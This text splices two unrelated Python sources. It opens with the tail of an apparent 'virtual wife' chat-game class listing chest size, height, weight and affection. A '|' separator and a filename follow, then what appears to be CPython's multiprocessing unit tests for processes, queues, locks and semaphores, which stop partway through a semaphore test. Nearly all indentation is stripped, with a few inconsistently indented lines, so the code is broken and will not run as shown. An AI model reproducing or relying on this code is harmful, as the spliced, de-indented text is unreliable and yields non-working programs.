f'胸围:{self.ouBai}\n' \
f'身高:{self.height}cm\n' \
f'体重:{self.weight}kg\n' \
f'当前好感度:{self.liking}\n'
WifeDict = dict()
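# Pick the next chat line: yandere (病娇) wives draw from YanDereList, married wives
# from MarryTalkList, everyone else from the generic LoveTalkList.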
def getScence(self: WifeObj) -> str:
if self.Character == '病娇':
return YanDereList[random.randint(0, len(YanDereList) - 1)].replace('\n', '')
    if self.isMerry:
return MarryTalkList[random.randint(0, len(MarryTalkList) - 1)].replace('\n', '')
data = LoveTalkList[random.randint(0, len(LoveTalkList) - 1)]
return data.replace('\n', '')
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import hashlib_helper
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.skip_if_broken_multiprocessing_synchronize()
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
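# Illustrative use (mirroring the tests below): wrap a blocking call to measure
# how long it blocked, e.g.
#   get = TimingWrapper(q.get)
#   get(True, 0.5)   # behaves exactly like q.get(True, 0.5)
#   get.elapsed      # ~0.5 if the call timed out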
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
